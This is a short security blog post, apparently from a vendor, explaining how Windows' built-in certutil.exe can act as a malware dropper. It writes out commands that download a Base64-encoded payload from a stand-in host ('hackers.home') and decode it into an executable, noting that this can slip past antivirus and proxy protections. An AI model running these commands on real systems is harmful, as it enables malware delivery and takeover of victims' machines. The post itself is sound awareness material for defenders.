Dropper and Windows – attack pattern
One of the basic attack patterns assumes that the victim will download and execute a dropper (software enabling the installation of additional software without user intervention). This, in turn, will download the proper malicious code. It turns out that standard Windows installations already contain a built-in cretutil.exe tool, which effectively can be used as an untraceable dropper. One of the designed certutil.exe features is displaying and managing certificates and keys. This seemingly simple applet has, however, one very complex functionality of the command line parameters. It accepts, among others, URL address as parameters.
Windows dropper in practice
Imagine the following attack:
C:\Temp>certutil.exe -urlcache -split -f “https://hackers.home/badcontent.txt” bad.txt
This causes the downloading of a malicious Base64-coded file from the Internet (which usually allows bypassing the antivirus and proxy protections)
C:\Temp>certutil.exe -decode bad.txt bad.exe
The file is unpacked to an executable form.
As a result, all that remains is to execute the malicious code on the victim’s computer and take full control over it.
Source: Internet Storm Center
—
Do you need cybersecurity solutions for your company – contact us.
